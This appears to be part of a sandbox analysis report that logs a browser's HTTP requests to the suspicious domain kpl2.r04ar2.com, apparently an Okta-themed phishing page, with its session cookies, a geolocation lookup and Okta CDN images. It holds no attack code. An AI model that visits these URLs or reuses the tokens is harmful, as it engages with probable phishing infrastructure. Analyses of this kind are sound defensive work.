https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /eflbaMIh8KvYQ56Fw0I2qKmn100 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kpl2.r04ar2.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
